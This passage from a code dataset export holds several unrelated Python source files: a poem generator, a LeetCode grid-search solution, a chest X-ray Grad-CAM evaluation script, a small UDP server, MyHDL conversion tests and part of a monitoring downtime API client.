pickle_in:\n # self.templates = pickle.load(pickle_in)\n #print(len(self.templates))\n\n with open(\"poems/end_pos.txt\", \"r\") as pickin:\n list = pickin.readlines()\n self.end_pos = {}\n for l in list:\n self.end_pos[l.split()[0]] = l.split()[1:]\n #self.end_pos['NNP'] = []\n\n self.pos_syllables = helper.create_pos_syllables(self.pos_to_words, self.dict_meters)\n\n with open(\"saved_objects/pos_sylls_mode.p\", \"rb\") as pickle_in:\n self.pos_sylls_mode = pickle.load(pickle_in)\n\n #with open(\"saved_objects/template_to_line.pickle\", \"rb\") as pickle_in:\n # self.templates = list(pickle.load(pickle_in).keys()) #update with sonnet ones one day\n\n #with open(\"saved_objects/template_no_punc.pickle\", \"rb\") as pickle_in:\n # self.templates = pickle.load(pickle_in)\n\n with open(\"poems/ben_templates.txt\", \"r\") as templs: #changed\n self.templates = {}\n self.tempnums = {}\n lines = templs.readlines()\n count = 1\n for line in lines:\n self.templates[\" \".join(line.split()[:-1])] = line.split()[-1].strip()\n self.tempnums[count] = \" \".join(line.split()[:-1])\n count += 1\n\n \"\"\"with open(\"saved_objects/loop_counts.txt\", \"r\") as l_c:\n self.max_loop = int(l_c.readlines()[-1])\"\"\"\n\n if prompt:\n self.gen_poem_scenic(prompt)\n\n def gen_poem_scenic(self, prompt, print_poem=True):\n \"\"\"\n\n Parameters\n ----------\n prompt - the word the base the poem on\n print_poem - optional parameter to print output\n\n Returns - a sonnet\n -------\n 1. generate a rhyme set\n 2. For every line pick a random word from the set:\n a. Get a random template which ends with the POS and meter of that word\n b. Get a random word which fits the POS and meter of the next word (working backwards)\n c. Repeat until template finished\n 3. 
Repeat for 14 lines\n\n \"\"\"\n #Get rhyming words\n #at some point implement narrative trajectory stuff\n rhyme_dict = {}\n #tone = ['good','good', 'good', 'good', 'bad', 'bad', 'excellent'] #for example\n #for i,j in zip(['A', 'B', 'C', 'D', 'E', 'F', 'G'], tone):\n # rhyme_dict[i] = self.getRhymes([prompt,j]) #one day pass [prompt, narr]\n last_word_dict_complete = False\n while not last_word_dict_complete:\n for i in ['A', 'B']:\n rhyme_dict[i] = self.getRhymes([prompt], words=self.filtered_nouns_verbs)\n last_word_dict = self.last_word_dict(rhyme_dict)\n last_word_dict_complete = True\n for key in last_word_dict.keys():\n if len(last_word_dict[key]) == 0:\n last_word_dict_complete = False\n #for now we shall generate random words, but they will fit the meter, rhyme and templates\n\n candidates = [\" ----\" + prompt.upper() + \"----\"]\n used_templates = []\n\n for line_number in range(1, 5):\n template = self.tempnums[line_number]\n pos_needed = template.split()\n first_word = random.choice(list(last_word_dict[line_number])) # last word is decided in last_word_dict\n\n #while first_word not in self.dict_meters.keys() or not self.suitable_last_word(first_word): #make sure its valid\n while not self.suitable_last_word(first_word, template):#changed valid check to ignore meter\n first_word = random.choice(list(last_word_dict[line_number]))\n\n\n in_template = self.get_word_pos(first_word)[0]\n\n while in_template != self.tempnums[line_number].split()[-1]:\n in_template = random.choice(self.get_word_pos(first_word)) #some words have multiple POS so make sure it picks the one with an existing template\n\n curr_line = first_word\n\n while len(curr_line.split()) < len(template.split()): #iterates until line is complete\n #if reset: print(\"HI\", curr_line.text)\n\n \"\"\"\n while not template:\n print(\"no template\", curr_line.pos_template, curr_line.text)\n first_w = curr_line.text.split()[0]\n first_pos = self.get_word_pos(first_w)\n\n if len(first_pos) > 1:\n curr_line.pos_template = random.choice(first_pos) + curr_line.pos_template[len(curr_line.pos_template.split()[0]):]\n template = self.get_random_template(curr_line.pos_template, curr_line.meter)\n\n else:\n print(\"unfixable\")\n print(1/0)\n \"\"\"\n\n next_pos = pos_needed[-len(curr_line.split()) - 1] #gets next POS from the right\n poss_words = self.get_pos_words(next_pos) #gets all possible words which fit pos and NOT meter\n\n if not poss_words:\n print(\"no words\", next_pos, template)\n print(1/0) #if there arent, die\n\n next_word = random.choice(poss_words) #pick word randomly\n\n curr_line = next_word + \" \" + curr_line #updates line\n #template = False #make a parameter?\n\n #line finished generating\n print(\"adding line\", line_number)\n print(curr_line)\n candidates.append(curr_line)\n\n #poem finished generating\n if print_poem:\n print(\"\")\n print(candidates[0])\n del candidates[0]\n for cand in range(len(candidates)):\n print(candidates[cand])#, \": \", candidates[cand].meter)\n if( (cand + 1) % 4 == 0): print(\"\")\n #return candidates\n\n\n def get_word_pos(self, word):\n \"\"\"\n Get the set of POS category of a word. 
If we are unable to get the category, return None.\n \"\"\"\n # Special case\n if word.upper() in self.special_words:\n return [word.upper()]\n if word not in self.words_to_pos:\n return None\n return self.words_to_pos[word]\n\n def get_pos_words(self,pos, meter=None):\n \"\"\"\n Gets all the words of a given POS\n Parameters\n ----------\n pos - the POS you want\n meter - (optional) returns only words which fit the given meter, e.g. 101\n \"\"\"\n if pos in self.special_words:\n return [pos.lower()]\n if pos not in self.pos_to_words:\n return None\n if meter:\n ret = [word for word in self.pos_to_words[pos] if word in self.dict_meters and meter in self.dict_meters[word]]\n if len(ret) == 0:\n return False\n return ret\n return self.pos_to_words[pos]\n\n def getRhymes(self, theme, words):\n \"\"\"\n :param theme: an array of either [prompt] or [prompt, line_theme] to find similar words to. JUST PROMPT FOR NOW\n :return: all words which rhyme with similar words to the theme in format {similar word: [rhyming words], similar word: [rhyming words], etc.}\n \"\"\"\n if len(theme) > 1:\n prompt = theme[0]\n tone = theme[1:]\n else:\n prompt = theme[0]\n tone = \"NONE\"\n try:\n with open(\"saved_objects/saved_rhymes\", \"rb\") as pickle_in:\n mydict = pickle.load(pickle_in)\n\n except:\n with open(\"saved_objects/saved_rhymes\", \"wb\") as pickle_in:\n mydict = {}\n pickle.dump(mydict, pickle_in)\n if prompt not in mydict.keys():\n mydict[prompt] = {}\n if tone not in mydict[prompt].keys():\n print(\"havent stored anything for \", theme, \"please wait...\")\n print(\" (ignore the warnings) \")\n words = helper.get_similar_word_henry(theme, n_return=20, word_set=set(words))\n w_rhyme_dict = {w3: {word for word in helper.get_rhyming_words_one_step_henry(self.api_url, w3) if\n word in self.filtered_nouns_verbs and word in self.dict_meters.keys() and word not in self.top_common_words[:70]} for #deleted: and self.filter_common_word_henry(word, fast=True)\n w3 in words if w3 not in self.top_common_words[:70] and w3 in self.dict_meters.keys()}\n\n #if len(w_rhyme_dict) > 0:\n mydict[prompt][tone] = {k: v for k, v in w_rhyme_dict.items() if len(v) > 0}\n\n with open(\"saved_objects/saved_rhymes\", \"wb\") as pickle_in:\n pickle.dump(mydict, pickle_in)\n return mydict[prompt][tone]\n\n def last_word_dict(self, rhyme_dict):\n \"\"\"\n Given the rhyme sets, extract all possible last words from the rhyme set\n dictionaries.\n\n Parameters\n ----------\n rhyme_dict: dictionary\n Format is {'A': {tone1 : {similar word: [rhyming words], similar word: [rhyming words], etc.}}, {tone2:{...}}},\n 'B': {tone1 : {similar word: [rhyming words], similar word: [rhyming words], etc.}}, {tone2:{...}}}\n etc\n Returns\n -------\n dictionary\n Format is {1: ['apple', 'orange'], 2: ['apple', orange] ... 
}\n\n \"\"\"\n scheme = {1: 'A', 2: 'B', 3: 'A', 4: 'B'}\n last_word_dict={}\n\n\n \"\"\"for i in range(1,15):\n temp = []\n if i in [1,2,5,6,9,10,13]: #lines with a new rhyme\n for k in rhyme_dict[scheme[i]].keys():\n temp.append(k)\n if i in [3,4,7,8,11,12,14]: #lines with an old line\n for k in rhyme_dict[scheme[i]].keys():\n temp += rhyme_dict[scheme[i]][k]\n #last_word_dict[i]=[*{*temp}]\n last_word_dict[i] = temp\"\"\"\n first_rhymes = []\n for i in range(1,5):\n if i in [1, 2]: # lines with a new rhyme -> pick a random key\n last_word_dict[i] = [random.choice(list(rhyme_dict[scheme[i]].keys()))] #NB ensure it doesnt pick the same as another one\n while not self.suitable_last_word(last_word_dict[i][0], self.tempnums[i]) or last_word_dict[i][0] in first_rhymes or any(rhyme_dict['A'][last_word_dict[i][0]] in rhyme_dict['A'][word] for word in first_rhymes):\n last_word_dict[i] = [random.choice(list(rhyme_dict[scheme[i]].keys()))]\n first_rhymes.append(last_word_dict[i][0])\n if i in [3, 4]: # lines with an old rhyme -> pick a random value corresponding to key of rhyming couplet\n letter = scheme[i]\n pair = last_word_dict[i-2][0]\n last_word_dict[i] = [word for word in rhyme_dict[letter][pair] if self.suitable_last_word(word, self.tempnums[i])]\n\n return last_word_dict\n\n def suitable_last_word(self, word, template): #checks if word has the part of speech of the last word in the template\n needed_pos = template.split()[-1]\n return any([w == needed_pos for w in self.words_to_pos[word]])\n","sub_path":"ben_test_scenery.py","file_name":"ben_test_scenery.py","file_ext":"py","file_size_in_byte":14356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"115990778","text":"# google\n\"\"\"\nOn an N x N grid, each square grid[i][j] represents the elevation at that point (i,j).\n\nNow rain starts to fall. At time t, the depth of the water everywhere is t. You can swim from a square to another 4-directionally\nadjacent square if and only if the elevation of both squares individually are at most t. You can swim infinite distance in zero time. Of\ncourse, you must stay within the boundaries of the grid during your swim.\n\nYou start at the top left square (0, 0). 
What is the least time until you can reach the bottom right square (N-1, N-1)?\n\nExample 1:\nInput: [[0,2],[1,3]]\nOutput: 3\nExplanation:\nAt time 0, you are in grid location (0, 0).\nYou cannot go anywhere else because 4-directionally adjacent neighbors have a higher elevation than t = 0.\nYou cannot reach point (1, 1) until time 3.\nWhen the depth of water is 3, we can swim anywhere inside the grid.\n\nExample 2:\nInput: [[0,1,2,3,4],[24,23,22,21,5],[12,13,14,15,16],[11,17,18,19,20],[10,9,8,7,6]]\nOutput: 16\nExplanation:\n 0 1 2 3 4\n24 23 22 21 5\n12 13 14 15 16\n11 17 18 19 20\n10 9 8 7 6\n\nThe final route is marked in bold.\nWe need to wait until time 16 so that (0, 0) and (4, 4) are connected.\nNote:\n\n2 <= N <= 50.\ngrid[i][j] is a permutation of [0, ..., N*N - 1].\n\"\"\"\nimport heapq\nimport collections\nclass Solution:\n def swimInWater(self, grid):\n \"\"\"\n :type grid: List[List[int]]\n :rtype: int\n \"\"\"\n N = len(grid)\n heap = [(grid[0][0], 0, 0)]\n visited = {grid[0][0]}\n while heap:\n t, i, j = heapq.heappop(heap)\n if i == N-1 and j == N-1: return t\n for ii, jj in {(i-1, j), (i+1, j), (i, j-1), (i, j+1)}:\n if 0 <= ii < N and 0 <= jj < N and grid[ii][jj] not in visited:\n visited.add(grid[ii][jj])\n heapq.heappush(heap, (max(t, grid[ii][jj]), ii, jj))\n return -1\n\n # binary search + bfs\n def swimInWater2(self, grid):\n N = len(grid)\n def reachable(t):\n queue = collections.deque()\n queue.append((0, 0))\n visited = {(0, 0)}\n while queue:\n r, c = queue.popleft()\n if grid[r][c] > t: continue\n if r == c == N-1: return True\n for dr, dc in [[-1, 0], [1, 0], [0, 1], [0, -1]]:\n r0, c0 = r + dr, c + dc\n if 0 <= r0 < N and 0 <= c0 < N and (r0, c0) not in visited:\n queue.append((r0, c0))\n visited.add((r0, c0))\n return False\n\n l, r = 0, N*N-1\n while l < r:\n m = (l+r) // 2\n if reachable(m): r = m\n else: l = m + 1\n return r\n\ns = Solution()\nassert s.swimInWater([[0,2],[1,3]]) == 3\nassert s.swimInWater([[0,1,2,3,4],[24,23,22,21,5],[12,13,14,15,16],[11,17,18,19,20],[10,9,8,7,6]]) == 16\n","sub_path":"leetcode/swimInRisingWater/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"59016702","text":"import csv\nimport cv2\nimport sys\nimport os\nimport torch\nimport pickle\nimport numpy as np\nimport skimage.transform\nimport torch.nn as nn\nimport torchvision\nimport torch.backends.cudnn as cudnn\nfrom torch.autograd import Variable\nimport torch.optim as optim\nfrom torch.autograd import Function\nfrom torchvision import models\nfrom torchvision import utils\nimport skimage\nfrom skimage.io import *\nfrom skimage.transform import *\nimport scipy\nimport scipy.ndimage as ndimage\nfrom gradcam import *\nfrom imageio import imread\nimport torchvision.transforms as transforms\nfrom torch.utils.data import Dataset, DataLoader\n\nuse_gpu = torch.cuda.is_available() \nnum_classes = 8\nclass_index = ['Atelectasis', 'Cardiomegaly', 'Effusion', 'Infiltrate', 'Mass', 'Nodule', 'Pneumonia', 'Pneumothorax']\nbbox_name =[]\nbbox_info = []\nimage_dic = {}\nwith open(\"./split/3-label/dataset/BBox_List_2017.csv\") as csvfile:\n readCSV = csv.reader(csvfile, delimiter=',')\n i = 0 \n for row in readCSV:\n if i != 0:\n if row[0] not in image_dic.keys(): \n image_dic[row[0]] = {} \n image_dic[row[0]][row[1]] = None \n #image_dic[row[0]][row[1]] = [] \n image_dic[row[0]][row[1]] = row \n bbox_name.append(row[0])\n bbox_info.append(row)\n i = i 
+ 1\ntest_txt_path = \"./split/3-label/dataset/test_list.txt\" \nimage_folder_path = \"./split/3-label/dataset/images\" \nwith open(test_txt_path, \"r\") as f:\n test_list = [i.strip() for i in f.readlines()]\ntest_data = []\nos.mkdir(\"original\")\nos.mkdir(\"masks\")\nos.mkdir(\"heatmaps\")\nos.mkdir(\"boundresults\")\n\nfor i in range(len(test_list)):\n image_path = os.path.join(image_folder_path, test_list[i])\n image = imread(image_path)\n if image.shape != (1024,1024):\n image = image[:,:,0]\n image_resized = skimage.transform.resize(image,(256,256), mode='reflect')\n test_data.append((np.array(image_resized)).reshape(256,256,1))\ntest_data = np.array(test_data)\n#print(\"length of test data\",len(test_list))\n\n# from https://www.pyimagesearch.com/2016/11/07/intersection-over-union-iou-for-object-detection/\ndef bb_intersection_over_union(boxA, boxB):\n\t# determine the (x, y)-coordinates of the intersection rectangle\n\txA = max(boxA[0], boxB[0])\n\tyA = max(boxA[1], boxB[1])\n\txB = min(boxA[2], boxB[2])\n\tyB = min(boxA[3], boxB[3])\n \n\t# compute the area of intersection rectangle\n\tinterArea = max(0, xB - xA + 1) * max(0, yB - yA + 1)\n \n\t# compute the area of both the prediction and ground-truth\n\t# rectangles\n\tboxAArea = (boxA[2] - boxA[0] + 1) * (boxA[3] - boxA[1] + 1)\n\tboxBArea = (boxB[2] - boxB[0] + 1) * (boxB[3] - boxB[1] + 1)\n \n\t# compute the intersection over union by taking the intersection\n\t# area and dividing it by the sum of prediction + ground-truth\n\t# areas - the interesection area\n\tiou = interArea / float(boxAArea + boxBArea - interArea)\n \n\t# return the intersection over union value\n\treturn iou \n\n\n\nclass CXRData(Dataset):\n def __init__(self, input = test_data, transform=None):\n self.x = np.uint8(test_data*255)\n self.transform = transform\n def __getitem__(self, index):\n current_x = np.tile(self.x[index],3)\n image = self.transform(current_x)\n return image\n def __len__(self):\n return len(self.x)\n\nclass densenet121(nn.Module):\n def __init__(self, out_size):\n super(densenet121, self).__init__()\n self.densenet121 = torchvision.models.densenet121(pretrained=True)\n #print(\"self.densenet121\", self.densenet121)\n num_features = self.densenet121.classifier.in_features\n self.densenet121.classifier = nn.Sequential(nn.Linear(num_features, out_size))#,nn.Sigmoid())\n def forward(self, x):\n x = self.densenet121(x)\n return x\n\nmodel = densenet121(num_classes)\nif use_gpu == True:\n model = model.cuda()\n\nmodel = torch.nn.DataParallel(model)\n#model.load_state_dict(torch.load(\"model/dense121_BCE9_0.6729095625692398.pkl\", map_location={'cuda:0': 'cpu'}))\nmodel.load_state_dict(torch.load(\"best/dense121_WBCE24_0.6797693935647515.pkl\", map_location={'cuda:0': 'cpu'}))\n#model.load_state_dict(torch.load(\"model/dense121_maskFalse_BCE_lr0.0002_wd0.0_drop_rate0.3_0.7092140641429037.pkl\", map_location={'cuda:0': 'cpu'}))\nmean = [0.485, 0.456, 0.406]\nstd = [0.229, 0.224, 0.225]\ntest_dataset = CXRData(input = test_data,transform=transforms.Compose([\n transforms.ToPILImage(),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize(mean,std)\n ]))\n\nprint(\"======= creating heatmap starts=======\")\nmodel.eval()\n\nheatmap_output = []\nimage_id = []\noutput_class = []\n\n\nif use_gpu == True:\n gcam = GradCAM(model=model, cuda=True)\nelse:\n gcam = GradCAM(model=model, cuda=False)\nall_iou_value = []\nfor index in range(len(test_dataset)):\n fname = test_list[index]\n func = nn.Sigmoid()\n test_output = 
func(model(test_dataset[index].unsqueeze(0)).detach())\n activate_classes = (test_output>0.5)[0]\n #optimal_thresholds = [0.024621395, 0.005373399, 0.012895545, 0.017944088, 0.09455918, 0.03133899, 0.0011880096, 0.022412254]\n #activate_classes = (test_output.numpy() >np.asarray(optimal_thresholds))[0]\n activate_classes = np.where(activate_classes ==True)[0]\n #activate_classes = range(0, len(class_index)) \n if fname in bbox_name and len(activate_classes)!=0:\n print(\"fname\", fname)\n print(\"activate_classes\",activate_classes)\n if use_gpu == True:\n input_image = Variable((test_dataset[index]).unsqueeze(0).cuda(), requires_grad=True)\n else:\n input_image = Variable((test_dataset[index]).unsqueeze(0), requires_grad=True)\n probs = gcam.forward(input_image)\n #activate_classes = np.where((probs > thresholds)[0]==True)[0] # get the activated class\n for activate_class in activate_classes:\n gcam.backward(idx=activate_class)\n #output = gcam.generate(target_layer=\"module.densenet121.features.denseblock4.denselayer16.conv.2\")\n output = gcam.generate(target_layer=\"module.densenet121.features.denseblock4.denselayer16.conv2\")\n if np.sum(np.isnan(output)) > 0:\n print(\"fxxx nan\")\n heatmap_output.append(output)\n image_id.append(index)\n output_class.append(activate_class)\n\n k = int(activate_class)\n original = input_image.detach().numpy()\n original = np.transpose(original, (0,2,3,1))[0]\n original = original * std + mean\n original = np.uint8(original * 255.0)\n gcam.save(\"./heatmaps/\"+ fname[:-4] +\"_\"+class_index[activate_class]+\".png\", output, original)\n print(\"heatmap output done\")\n\n mask = np.uint8(output * 255.0)\n cv2.imwrite(\"./masks/\"+fname[:-4] +\"_\"+class_index[activate_class]+\".png\", mask)\n mask_image = cv2.imread(\"./masks/\"+fname[:-4] +\"_\"+class_index[activate_class]+\".png\")\n #original_image = original\n cv2.imwrite(\"./original/\"+fname[:-4]+\"_\"+class_index[k]+\".png\",original ) \n original_image = cv2.imread(\"./original/\"+fname[:-4]+\"_\"+class_index[k]+\".png\") \n #print(\"original_image\", original_image[1,:])\n #ret, threshed_image = cv2.threshold(cv2.cvtColor(mask_image, cv2.COLOR_BGR2GRAY), 125, 255, cv2.THRESH_BINARY)\n ret, threshed_image = cv2.threshold(cv2.cvtColor(mask_image, cv2.COLOR_BGR2GRAY), 180, 255, cv2.THRESH_BINARY)\n kernel = np.ones((1,1), np.uint8)\n closing = cv2.morphologyEx(threshed_image, cv2.MORPH_CLOSE, kernel, iterations=20)\n #======\n #CV_CHAIN_APPROX_SIMPLE compresses horizontal, vertical, and diagonal segments and \n #leaves only their end points. For example, an up-right rectangular contour is encoded with 4 points\n #CV_RETR_EXTERNAL retrieves only the extreme outer contours. 
\n #It sets hierarchy[i][2]=hierarchy[i][3]=-1 for all the contours.\n #======\n _, contours, _ = cv2.findContours(closing, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n count = 0\n heatmap = cv2.imread(\"./heatmaps/\"+fname[:-4]+\"_\"+class_index[k]+\".png\") \n # Predictions (RED)\n temp_iou = -1 \n for cnt in contours:\n area = cv2.contourArea(cnt)\n #if (area > 30**2):\n if (area > 20**2):\n # bounding box\n x2, y2, w2, h2 = cv2.boundingRect(cnt)\n cv2.rectangle(original_image, (x2,y2), (x2+w2, y2+h2), (0,0,255), 2)\n if class_index[k] in image_dic[fname]: \n row_i = image_dic[fname][class_index[k]]\n fname = row_i[0]\n x , y, w,h = int(float(row_i[2])/4-16),int(float(row_i[3])/4-16),int(float(row_i[4])/4), int(float(row_i[5])/4)\n #cv2.rectangle(heatmap, (x,y), (x+w, y+h), (0,0,0), 2)\n # truth\n #cv2.rectangle(original_image, (x,y), (x+w, y+h), (255,0,0), 2)\n cv2.rectangle(original_image, (x,y), (x+w, y+h), (0,255,255), 2)\n boxA = [float(x) , float(y), float(x) + float(w),float(y) + float(h)]\n boxB = [float(x2), float(y2),float(x2)+ float(w2), float(y2) + float(h2)]\n new_iou = bb_intersection_over_union(boxA, boxB) \n if temp_iou < new_iou:\n temp_iou = new_iou\n cv2.imwrite(\"./boundresults/\"+fname[:-4]+\"_\"+class_index[k]+\".png\",original_image) \n if temp_iou !=-1:\n print(\"fname\", fname)\n print(\"class_index[k]\", class_index[k])\n print(\"temp_iou\", temp_iou)\n all_iou_value.append(temp_iou)\n #cv2.imwrite(\"./boundresults/\"+fname[:-4]+\"_\"+class_index[k]+\".png\",original_image) \nprint(all_iou_value)\nprint(\"len(all_iou_value)\",len(all_iou_value))\ngreater_than_thresh = []\nfor elem in all_iou_value:\n if(elem > 0.5):\n greater_than_thresh.append(1.0) \n else:\n greater_than_thresh.append(0.0) \n#print(\"greater_than_thresh 0.5\",greater_than_thresh)\nlength = len(greater_than_thresh)\nprint(\"Accuracy for threshold = 0.5\", sum(greater_than_thresh) / length)\ngreater_than_thresh2 = []\nfor elem in all_iou_value:\n if(elem > 0.25):\n greater_than_thresh2.append(1.0) \n else:\n greater_than_thresh2.append(0) \n#print(\"greater_than_thresh 0.25\",greater_than_thresh2)\nlength = len(greater_than_thresh2)\nprint(\"Accuracy for threshold = 0.25\", sum(greater_than_thresh2) / length)\n","sub_path":"code/main/detection.py","file_name":"detection.py","file_ext":"py","file_size_in_byte":10561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"646741852","text":"import os\nimport stat\n\nexecutable = stat.S_IEXEC | stat.S_IXGRP | stat.S_IXOTH\nfor filename in os.listdir('.'):\n if os.path.isfile(filename):\n st = os.stat(filename)\n mode = st.st_mode\n if mode & executable:\n print(filename,oct(mode))\n","sub_path":"solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"558302419","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author:Liang Lian\n\nimport socket\nip_port = ('127.0.0.1',9999)\nsk = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, 0)\nsk.bind(ip_port)\n\nwhile True:\n data = sk.recv(1024)\n print(str(data, encoding='utf-8'))","sub_path":"day9/socket_UDP/socket_udp_server.py","file_name":"socket_udp_server.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"588349657","text":"from __future__ import absolute_import\nimport os\npath = os.path\n\nimport random\nfrom random 
import randrange\nrandom.seed(2)\n\nfrom myhdl import *\n\nfrom myhdl import ConversionError\nfrom myhdl.conversion._misc import _error\n\n\nACTIVE_LOW, INACTIVE_HIGH = 0, 1\n\ndef incRef(count, enable, clock, reset, n):\n \"\"\" Incrementer with enable.\n \n count -- output\n enable -- control input, increment when 1\n clock -- clock input\n reset -- asynchronous reset input\n n -- counter max value\n \"\"\"\n @instance\n def logic():\n while 1:\n yield clock.posedge, reset.negedge\n if reset == ACTIVE_LOW:\n count.next = 0\n else:\n if enable:\n count.next = (count + 1) % n\n return logic\n\n\ndef incGen(count, enable, clock, reset, n):\n \"\"\" Generator with __vhdl__ is not permitted \"\"\"\n @instance\n def logic():\n __vhdl__ = \"Template string\"\n while 1:\n yield clock.posedge, reset.negedge\n if reset == ACTIVE_LOW:\n count.next = 0\n else:\n if enable:\n count.next = (count + 1) % n\n return logic\n\n \ndef inc(count, enable, clock, reset, n):\n \"\"\" Incrementer with enable.\n \n count -- output\n enable -- control input, increment when 1\n clock -- clock input\n reset -- asynchronous reset input\n n -- counter max value\n \"\"\"\n @always(clock.posedge, reset.negedge)\n def incProcess():\n # make it fail in conversion\n import types\n if reset == ACTIVE_LOW:\n count.next = 0\n else:\n if enable:\n count.next = (count + 1) % n\n\n count.driven = \"reg\"\n\n __vhdl__ = \\\n\"\"\"\nprocess (%(clock)s, %(reset)s) begin\n if (reset = '0') then\n %(count)s <= (others => '0');\n elsif rising_edge(%(clock)s) then\n if (enable = '1') then\n %(count)s <= (%(count)s + 1) mod %(n)s;\n end if;\n end if;\nend process;\n\"\"\"\n \n return incProcess\n\n\ndef incErr(count, enable, clock, reset, n):\n \n @always(clock.posedge, reset.negedge)\n def incProcess():\n # make it fail in conversion\n import types\n if reset == ACTIVE_LOW:\n count.next = 0\n else:\n if enable:\n count.next = (count + 1) % n\n\n count.driven = \"reg\"\n\n __vhdl__ = \\\n\"\"\"\nalways @(posedge %(clock)s, negedge %(reset)s) begin\n if (reset == 0) begin\n %(count)s <= 0;\n end\n else begin\n if (enable) begin\n %(count)s <= (%(countq)s + 1) %% %(n)s;\n end\n end\nend\n\"\"\"\n \n return incProcess\n\n\n\ndef inc_comb(nextCount, count, n):\n\n @always_comb\n def logic():\n # make if fail in conversion\n import types\n nextCount.next = (count + 1) % n\n\n nextCount.driven = \"wire\"\n\n __vhdl__ =\\\n\"\"\"\n%(nextCount)s <= (%(count)s + 1) mod %(n)s;\n\"\"\"\n\n return logic\n\ndef inc_seq(count, nextCount, enable, clock, reset):\n\n @always(clock.posedge, reset.negedge)\n def logic():\n if reset == ACTIVE_LOW:\n count.next = 0\n else:\n if (enable):\n count.next = nextCount\n\n count.driven = True\n\n __vhdl__ = \\\n\"\"\"\nprocess (%(clock)s, %(reset)s) begin\n if (reset = '0') then\n %(count)s <= (others => '0');\n elsif rising_edge(%(clock)s) then\n if (enable = '1') then\n %(count)s <= %(nextCount)s;\n end if;\n end if;\nend process;\n\"\"\"\n \n return logic\n\ndef inc2(count, enable, clock, reset, n):\n \n nextCount = Signal(intbv(0, min=0, max=n))\n\n comb = inc_comb(nextCount, count, n)\n seq = inc_seq(count, nextCount, enable, clock, reset)\n\n return comb, seq\n\n\ndef inc3(count, enable, clock, reset, n):\n inc2_inst = inc2(count, enable, clock, reset, n)\n return inc2_inst\n\n\ndef clockGen(clock):\n @instance\n def logic():\n clock.next = 1\n while 1:\n yield delay(10)\n clock.next = not clock\n return logic\n\nNRTESTS = 1000\n\nENABLES = tuple([min(1, randrange(5)) for i in range(NRTESTS)])\n\ndef 
stimulus(enable, clock, reset):\n @instance\n def logic():\n reset.next = INACTIVE_HIGH\n yield clock.negedge\n reset.next = ACTIVE_LOW\n yield clock.negedge\n reset.next = INACTIVE_HIGH\n for i in range(NRTESTS):\n enable.next = 1\n yield clock.negedge\n for i in range(NRTESTS):\n enable.next = ENABLES[i]\n yield clock.negedge\n raise StopSimulation\n return logic\n\n\ndef check(count, enable, clock, reset, n):\n @instance\n def logic():\n expect = 0\n yield reset.posedge\n # assert count == expect\n print(count)\n while 1:\n yield clock.posedge\n if enable:\n expect = (expect + 1) % n\n yield delay(1)\n # print \"%d count %s expect %s count_v %s\" % (now(), count, expect, count_v)\n # assert count == expect\n print(count)\n return logic\n\n\ndef customBench(inc):\n\n m = 8\n n = 2 ** m\n\n count = Signal(intbv(0)[m:])\n enable = Signal(bool(0))\n clock, reset = [Signal(bool(1)) for i in range(2)]\n\n inc_inst = inc(count, enable, clock, reset, n=n)\n clk_1 = clockGen(clock)\n st_1 = stimulus(enable, clock, reset)\n ch_1 = check(count, enable, clock, reset, n=n)\n\n return inc_inst, clk_1, st_1, ch_1\n\n\n\ndef testIncRef():\n assert conversion.verify(customBench, incRef) == 0\n\ndef testInc():\n assert conversion.verify(customBench, inc) == 0\n \ndef testInc2():\n assert conversion.verify(customBench, inc2) == 0\n \ndef testInc3():\n assert conversion.verify(customBench, inc3) == 0\n\ndef testIncGen():\n try:\n assert conversion.verify(customBench, incGen) == 0\n except ConversionError as e:\n pass\n else:\n assert False\n \ndef testIncErr():\n try:\n assert conversion.verify(customBench, incErr) == 0\n except ConversionError as e:\n pass\n else:\n assert False\n\n\n\n\n \n\n \n \n\n\n \n\n \n\n","sub_path":"test/conversion/toVHDL/test_custom.py","file_name":"test_custom.py","file_ext":"py","file_size_in_byte":6193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"345889404","text":"n,m=map(int,input().split())\ns=n|m\ny=bin(s)\n#print(s)\nc=0\nfor i in range(0,len(y)):\n if y[i]==\"1\":\n c=c+1 \nprint(c)\n \n","sub_path":"p160.py","file_name":"p160.py","file_ext":"py","file_size_in_byte":136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"549432055","text":"from . import common\nfrom . 
import errors\n\n\n# =====\nclass DowntimesApi(common.BaseApi):\n def get(self, host, service=None, handle=\"api/downtime/check.sbml\"):\n attrs = {\n \"object\": host,\n \"append_comment\": \"1\",\n \"downtime_type\": \"current_future\",\n }\n if service is not None:\n attrs[\"eventtype\"] = service\n\n result = self._get(handle, attrs)\n if result.status_code == 200 and result.text.startswith(\"ok\"):\n values = result.text.split(\" \", 3)[1:]\n if len(values) == 0:\n return None # No downtime\n elif len(values) == 3:\n return {\n \"start\": int(values[0]),\n \"end\": int(values[1]),\n \"description\": values[2].strip(),\n }\n else:\n raise RuntimeError(\"Invalid response from Golem: {}\".format(values))\n else:\n raise errors.GolemApiError(result)\n\n def set(self, host, user, timeout, description, service=None, handle=\"api/downtime/set.sbml\"):\n attrs = {\n \"hostname\": host,\n \"user\": user,\n \"downtime_for\": timeout,\n \"comment\": description,\n }\n if service is not None:\n attrs[\"service\"] = service\n attrs[\"cmd\"] = \"service_downtime\"\n else:\n attrs[\"cmd\"] = \"host_downtime\"\n\n result = self._post(handle, attrs)\n if result.status_code == 200 and result.text.startswith(\"ok\"):\n return\n else:\n raise errors.GolemApiError(result)\n\n def delete(self, host, user, description, service=None, handle=\"api/downtime/set.sbml\"):\n self.set(host, user, 1, description, service, 